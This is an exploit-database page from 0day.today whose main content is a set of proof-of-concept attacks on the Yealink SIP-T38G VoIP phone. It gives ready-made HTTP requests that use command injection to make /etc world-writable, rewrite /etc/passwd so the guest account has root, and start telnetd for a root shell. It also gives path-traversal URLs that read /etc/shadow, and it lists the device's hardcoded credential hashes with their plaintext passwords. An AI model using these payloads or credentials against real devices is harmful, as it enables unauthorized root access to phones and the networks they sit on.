0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
Title: Yealink VoIP Phone SIP-T38G Privileges Escalation Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5759 Description: Using the fact that cgiServer.exx run under the root privileges we use the command execution (CVE-2013-5758) to modify the system file restriction. Then we add extra privileges to the guest account. POC: Step 1 - Changing /etc folder right to 777: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("/bin/busybox%20chmod%20-R%20777%20/etc") Step 2 - Change guest user uid: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("echo "root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd ") Step 3 - Connect back using telnet and guest account (password is guest): # id uid=0(root) gid=0(root) Enjoy your root shell :) Title: Yealink VoIP Phone SIP-T38G Remote Command Execution Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5758 Description: Using cgiServer.exx we are able to send OS command using the system function. POC: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755) Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("/bin/busybox%20telnetd%20start") Title: Yealink VoIP Phone SIP-T38G Local File Inclusion Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5756, CVE-2013-5757 Description: Web interface contain a vulnerability that allow any page to be included. We are able to disclose /etc/passwd & /etc/shadow POC: Using the page parameter (CVE-2013-5756): http:// [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http:// [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow Using the command parameter (CVE-2013-5757): http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow") *By viewing the shadow file we are able to conclude that cgiServer.exx run under the root privileges. This lead to CVE-2013-5759. Title: Yealink VoIP Phone SIP-T38G Default Credentials Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5755 Description: Web interface use hardcoded default credential in /config/.htpasswd user:s7C9Cx.rLsWFA admin:uoCbM.VEiKQto var:jhl3iZAe./qXM Here's the cleartext password for these accounts: user:user admin:admin var:var -- *Mr.Un1k0d3r** or 1 #* # 0day.today [2024-09-29] #